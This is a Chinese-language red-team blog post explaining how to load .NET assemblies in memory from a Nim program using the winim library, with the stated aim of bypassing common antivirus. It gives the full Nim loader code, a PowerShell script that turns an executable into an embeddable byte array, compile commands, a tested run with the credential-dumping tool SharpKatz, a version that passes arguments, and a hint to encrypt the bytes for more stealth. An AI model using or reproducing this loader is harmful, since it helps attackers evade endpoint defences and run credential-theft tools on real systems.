Nim套娃加载.NET程序集

简介

使用OffensiveNim绕过常见杀软。

Start the game

主要用到的库是WINIM

import winim/clr
import sugar
import strformat

# Just pops a message box... or does it? ;)
var buf: array[4608, byte] = [byte 0x4d,0x5a,0x90,0x0]

echo "[*] Installed .NET versions"
for v in clrVersions():
echo fmt" \--- {v}"
echo "\n"

echo ""

var assembly = load(buf)
dump assembly

var arr = toCLRVariant([""], VT_BSTR) # Passing no arguments
assembly.EntryPoint.Invoke(nil, toCLRVariant([arr]))

arr = toCLRVariant(["From Nim & .NET!"], VT_BSTR) # Actually passing some args
assembly.EntryPoint.Invoke(nil, toCLRVariant([arr]))

作者提供了一个ps脚本将exe转为符合nim的bytes数组。

function CSharpToNimByteArray
{

Param
(
[string]
$inputfile,
[switch]
$folder
)

if ($folder)  
{  
    $Files = Get-Childitem -Path $inputfile -File  
    $fullname = $Files.FullName  
    foreach($file in $fullname)  
    {  
        Write-Host "Converting $file"  
        $outfile = $File + "NimByteArray.txt"  
  
        \[byte\[\]\] $hex = get-content -encoding byte -path $File  
        $hexString = ($hex|ForEach-Object ToString X2) -join ',0x'  
        $Results = $hexString.Insert(0,"var buf: array\[" + $hex.Length + ", byte\] = \[byte 0x")  
        $Results = $Results + "\]"           
        $Results | out-file $outfile  
       
    }  
    Write-Host -ForegroundColor yellow "Results Written to the same folder"  
}  
else  
{  
    Write-Host "Converting $inputfile"  
    $outfile = $inputfile + "NimByteArray.txt"  
      
    \[byte\[\]\] $hex = get-content -encoding byte -path $inputfile  
    $hexString = ($hex|ForEach-Object ToString X2) -join ',0x'  
    $Results = $hexString.Insert(0,"var buf: array\[" + $hex.Length + ", byte\] = \[byte 0x")  
    $Results = $Results + "\]"           
    $Results | out-file $outfile  
    Write-Host "Result Written to $outfile"  
}  

}

测试SharpKatz

体积有点大。

编译

nim c -d=mingw --app=console --cpu=amd64 execute_assembly.nim

Bingo

体积只有800k。

现在还没法执行自定义参数，源码修改后如下:

import winim/clr
import sugar
import strformat
import os

# Just pops a message box... or does it? ;)
var buf: array[4608, byte] = [byte 0x4d,0x5a,0x90,0x0]

echo "[*] Installed .NET versions"
for v in clrVersions():
echo fmt" \--- {v}"
echo "\n"

echo ""

var assembly = load(buf)
dump assembly

var cmd: seq[string]
var i = 1
while i <= paramCount():
cmd.add(paramStr(i))
inc(i)
echo cmd
var arr = toCLRVariant(cmd, VT_BSTR)
assembly.EntryPoint.Invoke(nil, toCLRVariant([arr]))

OJBK.

要更进一步隐藏的话，需要对字节进行加密解密。

nim感觉搞懂winim这个库就能写好多小工具了。

戳我直达原文地址

插播一条广告，使用语雀开了一个红队知识库的空间，免费共享。

详情地址 https://www.yuque.com/u212486/hqo6tb/rmzr1u